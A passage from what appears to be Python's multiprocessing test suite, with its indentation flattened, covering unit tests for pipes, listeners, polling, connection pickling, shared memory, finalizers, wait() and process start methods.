def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
